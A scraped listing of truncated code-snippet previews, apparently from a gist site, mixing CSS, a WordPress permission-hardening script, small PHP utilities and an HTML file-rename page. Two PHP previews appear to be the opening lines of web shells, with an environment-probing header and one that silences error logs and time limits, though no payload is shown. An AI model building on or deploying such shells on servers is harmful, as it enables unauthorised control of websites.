This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.f-s-200{font-size:200px!important}.f-s-199{font-size:199px!important}.f-s-198{font-size:198px!important}.f-s-197{font-size:197px!important}.f-s-196{font-size:196px!important}.f-s-195{font-size:195px!important}.f-s-194{font-size:194px!important}.f-s-193{font-size:193px!important}.f-s-192{font-size:192px!important}.f-s-191{font-size:191px!important}.f-s-190{font-size:190px!important}.f-s-189{font-size:189px!important}.f-s-188{font-size:188px!important}.f-s-187{font-size:187px!important}.f-s-186{font-size:186px!important}.f-s-185{font-size:185px!important}.f-s-184{font-size:184px!important}.f-s-183{font-size:183px!important}.f-s-182{font-size:182px!important}.f-s-181{font-size:181px!important}.f-s-180{font-size:180px!important}.f-s-179{font-size:179px!important}.f-s-178{font-size:178px!important}.f-s-177{font-size:177px!important}.f-s-176{font-size:176px!important}.f-s-175{font-size:175px!important}.f-s-174{font-size:174px!important}.f-s-173{font-size:173px!important}.f-s-172{font-size:172px!important}.f-s-171{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
error_reporting(7); | |
@set_magic_quotes_runtime(0); | |
ob_start(); | |
$mtime = explode(' ', microtime()); | |
$starttime = $mtime[1] + $mtime[0]; | |
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/'); | |
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 ); | |
define('IS_WIN', DIRECTORY_SEPARATOR == '\\'); | |
define('IS_COM', class_exists('COM') ? 1 : 0 ); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# This script configures WordPress file permissions based on recommendations | |
# from http://codex.wordpress.org/Hardening_WordPress#File_permissions | |
# | |
# Author: Michael Conigliaro <mike [at] conigliaro [dot] org> | |
# | |
WP_OWNER=www-data # <-- wordpress owner | |
WP_GROUP=www-data # <-- wordpress group | |
WP_ROOT=$1 # <-- wordpress root directory |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
session_start(); | |
error_reporting(0); | |
set_time_limit(0); | |
@set_magic_quotes_runtime(0); | |
@clearstatcache(); | |
@ini_set('error_log',NULL); | |
@ini_set('log_errors',0); | |
@ini_set('max_execution_time',0); | |
@ini_set('output_buffering',0); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function Recursive_Dir($anadizin){ | |
$dosyalar = array(); | |
$dizinler = array(); | |
$dizin = (substr($anadizin, -1) == '/') ? substr($anadizin, 0, -1) : $anadizin; | |
if(is_dir($dizin)){ | |
if($islem = opendir($dizin)){ | |
while(false !== ($dosya = readdir($islem))){ | |
if($dosya != "." && $dosya != ".."){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// TimeZone (Yaz saati uygulaması nedeniyle TR için aşağıdaki şekilde olmalıdır.) | |
date_default_timezone_set("Asia/Riyadh"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$myRed = 255; | |
$myGreen = 0; | |
$myBlue = 0; | |
$im = imagecreatefrompng('http://www.clker.com/cliparts/a/5/8/e/1298546227709322759png-transparency-md.png'); | |
imageAlphaBlending($im, true); | |
imageSaveAlpha($im, true); | |
if (imageistruecolor($im)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
ob_start("html_compress"); | |
ob_implicit_flush(1); | |
function html_compress($html){ | |
$html = preg_replace('/<!-(.*)->/Uis', '', $html); | |
$html = preg_replace('/[\r\n\t\s]+/s', ' ', $html); | |
$html = preg_replace('#/\*.*?\*/#', ' ', $html); | |
$html = preg_replace('/^\s+/', ' ', $html); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!doctype html> | |
<html lang="tr"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" | |
content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> | |
<meta http-equiv="X-UA-Compatible" content="ie=edge"> | |
<link rel="author" href="http://www.kazimolmez.com" /> | |
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"> | |
<title>Rename Files</title> |